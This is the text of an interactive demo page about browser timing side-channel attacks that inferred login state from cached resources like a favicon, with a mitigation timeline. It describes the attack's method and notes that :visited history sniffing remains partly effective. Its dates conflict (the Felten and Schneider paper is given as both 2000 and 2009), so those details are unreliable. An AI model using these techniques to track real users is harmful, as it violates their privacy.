A cached, authenticated resource loads faster than an uncached one.
Before 2019, any website could measure this and infer whether you were logged in
to other services — from timing alone, with no cookies and no interaction.
Before 2020, any website could detect which social networks you were logged into
— from load time alone, in under 100ms, no permission needed.
Browsers patched this in 2020–2021 via partitioned caches and SameSite cookie policy.
The attack required zero cooperation from the target site and worked across all browsers.
0probed
—ms measured
—browser protected
why most results show blocked: Modern browsers enforce SameSite=Lax cookies
and partitioned HTTP caches that prevent cross-site timing attacks. The fetch() calls above complete
with CORS errors rather than returning cached resources — intentionally defeating this attack.
What the attack looked like pre-2019: An attacker page loaded an image from
https://facebook.com/favicon.ico and measured the time. Logged-in users returned the
cached favicon in ~5ms. Logged-out users triggered a redirect and auth check — 80–200ms.
The difference identified login state with >90% accuracy.
browser mitigations timeline
2009Felten & Schneider document timing side-channel for login state detection. Shared HTTP cache exploitable from any origin.
2010Widespread exploitation via <img> tags and fetch(). No browser mitigation. Works across all browsers.
2016SameSite cookie attribute proposed. Not yet enforced by default in any major browser.
2019Chrome 76 begins enforcing SameSite=Lax by default. Partial mitigation; cache partitioning not yet deployed.
2020Chrome 86 ships double-keyed HTTP cache partitioning (top-frame origin + request origin). Safari 13.1 ships ITP with full cache partitioning. Firefox 85 follows in 2021.
2021Attack is largely defeated in modern browsers. CSS :visited history sniffing and XS-Leaks remain partial vectors in some configurations.
▶ history of login state detection attacks
The timing side-channel attack for login state detection was first documented by Felten and Schneider (2000, “Timing Attacks on Web Privacy”). The key insight: browsers maintain a shared HTTP cache across all origins. If you're logged into Facebook, the Facebook favicon is cached. Any page can try to load it and measure the time — cached = fast = logged in.
The attack was publicly documented, widely known, and remained exploitable for over a decade. Major browsers finally patched it between 2019 and 2021 through a combination of:
SameSite cookie policy — cookies no longer sent on cross-site subresource requests by default
Partitioned HTTP cache — each origin gets its own cache partition (Chrome 86, 2020; Firefox 85, 2021; Safari 13.1, 2020)
CORS restrictions — cross-origin fetch() calls blocked unless the target explicitly allows it
Before these mitigations, the attack required: one malicious webpage, a list of target URLs, fetch() or an <img> tag, and a timer. No user interaction. No permissions. No cookies from the attacker.
Variants using CSS :visited link style detection (history sniffing) remain partially effective. If a user has visited a URL, :visited styling applies and can be measured via getComputedStyle().